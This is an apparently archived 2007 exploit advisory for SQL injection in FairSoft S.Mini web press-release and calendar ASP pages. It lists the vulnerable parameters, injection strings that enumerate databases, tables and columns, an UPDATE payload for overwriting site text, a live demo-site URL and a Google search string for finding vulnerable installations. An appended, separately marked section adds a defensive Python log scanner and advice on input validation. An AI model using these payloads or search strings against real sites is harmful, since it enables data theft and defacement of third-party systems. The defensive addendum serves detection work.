From: okan alp <codexploder_(at)_hotmail.com>
Date: 19.11.2007
Subject: FairSoft S.Mini web Busines Prelease & Calendar asp Sql injection

thnx bro

FairSoft S.Mini web Busines Prelease & Calendar asp Sql injection

#include path...ocf,ns

#(ocf/Calendar/ViewEvent.asp, ns/Calendar/ViewEvent.asp, aboutus/newsroom/ViewPressRelease.asp)

Credit : CodeXpLoder'tq

Mail   : codexploder[at]hotmail[dot]com

Site   : codexploder.biyosecurity.net,biyofrm.com

Source : ocfair.com

##########################################################################

Thnx   : Liz0ziM,eno7,sao,Crackers_child,erne,The_bekir,Di_lejyoner,3APA3A

Zeberus,Hacker_Onur,DesquneR,rapstarmurat,Uyussman

and

BiyoSecurity all members

###########################################################################

1-)  example.com/[path]/[path]/ViewPressRelease.asp?PRelId=(sql method)

1-)  example.com/ns/PressRelease/ViewPressRelease.asp?PRelId=(sql method)

2-)  example.com/[path]/[path]/[path]/ViewPressRelease.asp?PRelId=(sql method)

2-)  example.com/fp/AboutUs/Newsroom/ViewPressRelease.asp?PRelId=(sql method)

3-)  example.com/[path]/[path]/ViewPressRelease.asp?PRelId=(sql method)

3-)  example.com/ns/Calendar/ViewEvent.asp?EventId=(sql method)


2-) example.com/[path]/[path]/ViewPressRelease.asp?PRelId=(sql method)

2-) PressRelease/ViewPressRelease.asp?PRelId(sql method)

2-) PressRelease/ViewPressRelease.asp?PRelId=1'

2-) PressRelease/ViewPressRelease.asp?PRelId=1 having 1=1

2-) PressRelease/ViewPressRelease.asp?PRelId1,2,3,4,5

2-) PressRelease/ViewPressRelease.asp?PRelId1,2,3,4,
5+update+tbl+set+column='your text or meta code';--

2-) example.com/Calendar/ViewEvent.asp?EventId=<amt>

#for db : convert(int, db_name(1)

    : convert(int, db_name(2)

#for other tbl    : convert(int, (select top 1 name from sysobjects where xtype='U' and name>'TABLE'))

#for other column : convert(int, (select top 1 name from syscolumns where colid=COLUMNID and id=(select top 1 id from sysobjects where xtype='U' and name='TABLE')))


#press release tbl    : PressReleases
#press release column : ReleaseTitle
#event tbl            : Events
#event column         : vchEventName

##########################################################

demo site: http://kerncountyfair.ntelligentsystems.com/home.asp

google search code :  inurl:"ViewPressRelease.asp?PRelId"
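
Added example, not part of the original advisory: a defender-side check for IIS W3C logs that flags requests to ViewPressRelease.asp or ViewEvent.asp where PRelId or EventId is not a plain integer, which covers the quote, having 1=1 and convert(...) probes listed above. The function names check_request and scan_iis_log, the log lines and the IP addresses are constructed for illustration, and the check assumes both parameters are meant to be integer IDs.

```python
import re
from urllib.parse import parse_qsl

# Integer ID parameters the advisory names, keyed by the script that reads them.
NUMERIC_PARAMS = {"viewpressrelease.asp": "prelid", "viewevent.asp": "eventid"}
# SQL fragments seen in the advisory; they only label a hit, they do not decide it.
SQL_HINTS = re.compile(r"having\s+1=1|convert\s*\(|sysobjects|syscolumns|db_name", re.I)

def check_request(stem, query):
    """Return None if the ID parameter is a plain integer, else a reason string."""
    wanted = NUMERIC_PARAMS.get(stem.rsplit("/", 1)[-1].lower())
    if wanted is None or query == "-":
        return None
    # parse_qsl undoes %xx and '+' encoding, so encoded probes are caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() == wanted and not re.fullmatch(r"[0-9]{1,10}", value):
            return "sql-fragment" if SQL_HINTS.search(value) else "non-integer"
    return None

def scan_iis_log(lines):
    """Return (client ip, uri stem, reason) for each suspicious W3C log row."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order is declared in the log itself
        elif fields and line.strip() and not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            reason = check_request(row.get("cs-uri-stem", ""), row.get("cs-uri-query", "-"))
            if reason:
                hits.append((row.get("c-ip"), row["cs-uri-stem"], reason))
    return hits

# Constructed sample log (documentation IP addresses, not real traffic).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2007-11-19 10:00:01 192.0.2.10 GET /ns/PressRelease/ViewPressRelease.asp PRelId=12 200
2007-11-19 10:00:05 192.0.2.44 GET /ns/PressRelease/ViewPressRelease.asp PRelId=1' 500
2007-11-19 10:00:09 192.0.2.44 GET /ns/PressRelease/ViewPressRelease.asp PRelId=1+having+1=1 500
2007-11-19 10:00:12 192.0.2.44 GET /ns/Calendar/ViewEvent.asp EventId=convert(int,db_name(1)) 500
2007-11-19 10:00:20 192.0.2.10 GET /home.asp - 200
""".splitlines()

if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule, applied in the ASP pages before the value reaches the query and combined with a parameterized command, removes the injection point rather than only detecting probes against it.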


© SecurityVulns, 3APA3A, Vladimir Dubrovin